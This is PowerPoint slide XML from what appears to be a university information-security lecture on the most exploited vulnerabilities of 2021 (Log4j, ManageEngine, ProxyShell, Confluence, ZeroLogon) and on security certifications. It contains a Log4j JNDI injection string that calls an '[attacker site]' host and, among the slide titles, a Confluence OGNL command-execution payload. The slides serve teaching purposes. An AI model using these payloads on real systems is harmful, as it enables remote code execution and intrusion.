            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="6324600" cy="3492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Management of Information Security, 5th Edition, © Cengage Learning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672800" y="1319364"/>
            <a:ext cx="6846401" cy="4852837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428618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C4AD-2B8F-4226-9C60-C955A9FA2B67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache Log4j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA616ADF-23C4-4EB6-94CE-ABFDAF7FD9FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache Log4j is a Java-based logging utility developed by the Apache Software Foundation. Several companies use the Log4j library worldwide to enable logging and configure a wide set of applications. The Log4j flaw allows hackers to run any code on vulnerable machines or hack into any application directly using the Log4j framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reportedly first discovered by the Microsoft/Mojang team handling Minecraft. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307789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BED3-4FC7-4450-9C69-B5E545F78906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DED9B1E-74C8-4B5B-BA68-811E3DD11222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows an unauthenticated attacker to perform remote code execution when crafting a malicious string through various inputs in the application or affected product. An example of this string that may be used by researchers and attackers alike is through the Java Naming and Directory Interface:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://[attacker site]/endpoint}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343895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NDI Overview">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4B9BA06-2C8E-4965-AD5D-5BB1D0DEF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156"/>
            <a:ext cx="10972800" cy="685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5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ertification">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36BB124D-1F33-4B30-9A11-D34F79ADA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85" y="2376"/>
            <a:ext cx="10852030" cy="6855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030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2822-1EB5-443A-8EF4-E6DDACE83F78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zoho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ManageEngine AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SelfService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Plus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6D3258-2311-43DD-BB81-321680489D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Rest API URLs are authenticated by a specific security filter in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ADSelfService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Plus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers used specially crafted Rest API URLs that were able to bypass this security filter due to an error in normalizing the URLs before validation. This, in turn, gave attackers access to REST API endpoints, and they exploited the endpoints to perform subsequent attacks such as arbitrary command execution. The following exploit analysis flowchart shows how the attackers exploited the vulnerability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201221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lock User Tab">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B58672-AFF6-478E-A037-EBEF22523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513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17319</TotalTime>
  <Words>2296</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>244</Paragraphs>
  <Slides>39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Security Assessment and  Risk Management</vt:lpstr>
      <vt:lpstr>McCumber Cube</vt:lpstr>
      <vt:lpstr>Alert (AA22-117A) 2021 Top Routinely Exploited Vulnerabilities</vt:lpstr>
      <vt:lpstr>Apache Log4j</vt:lpstr>
      <vt:lpstr>Attack Details</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Zoho ManageEngine AD SelfService Plus</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ProxyShell &amp; ProxyLogon</vt:lpstr>
      <vt:lpstr>Confluence OGNL Injection</vt:lpstr>
      <vt:lpstr>Confluence OGNL Injection</vt:lpstr>
      <vt:lpstr>${@java.lang.Runtime@getRuntime().exec ('ping%20-c%203%20&lt;IP_ADDRESS&gt;')}</vt:lpstr>
      <vt:lpstr>ZeroLogon</vt:lpstr>
      <vt:lpstr>ZeroLogon</vt:lpstr>
      <vt:lpstr>ZeroLogon</vt:lpstr>
      <vt:lpstr>Information Security Professional Credentials</vt:lpstr>
      <vt:lpstr>(ISC)2 Certifications</vt:lpstr>
      <vt:lpstr>Certified Information Systems Security Professional (CISSP) </vt:lpstr>
      <vt:lpstr>CISSP Concentrations</vt:lpstr>
      <vt:lpstr>CISSP Concentrations (cont.)</vt:lpstr>
      <vt:lpstr>Systems Security Certified Practitioner (SSCP)</vt:lpstr>
      <vt:lpstr>Other (ISC)2 Certifications </vt:lpstr>
      <vt:lpstr>ISACA Certifications</vt:lpstr>
      <vt:lpstr>Certified Information Security Manager (CISM)</vt:lpstr>
      <vt:lpstr>Certified Information Security Manager (CISM)</vt:lpstr>
      <vt:lpstr>Certified in the Governance of IT (CGEIT)</vt:lpstr>
      <vt:lpstr>Certified in Risk and Information Systems Controls (CRISC)</vt:lpstr>
      <vt:lpstr>Certified Information Systems Auditor (CISA) </vt:lpstr>
      <vt:lpstr>GIAC Certifications</vt:lpstr>
      <vt:lpstr>EC-Council Certifications</vt:lpstr>
      <vt:lpstr>CompTIA Certifications</vt:lpstr>
      <vt:lpstr>CompTIA Advanced Security Practitioner (CASP)</vt:lpstr>
      <vt:lpstr>Security +</vt:lpstr>
      <vt:lpstr>ISFCE Certifications</vt:lpstr>
      <vt:lpstr>Certification Costs</vt:lpstr>
      <vt:lpstr>Preparing for Security Certification</vt:lpstr>
      <vt:lpstr>Entering the Information Security Profession</vt:lpstr>
      <vt:lpstr>Information Security Career Paths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Assessment and  Risk Management</dc:title>
  <dc:creator>Chad Johnson</dc:creator>
  <cp:lastModifiedBy>Johnson, Chad</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-17T17:37:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-09T18:43:31Z</dcterms:modified>
</cp:coreProperties>
</file>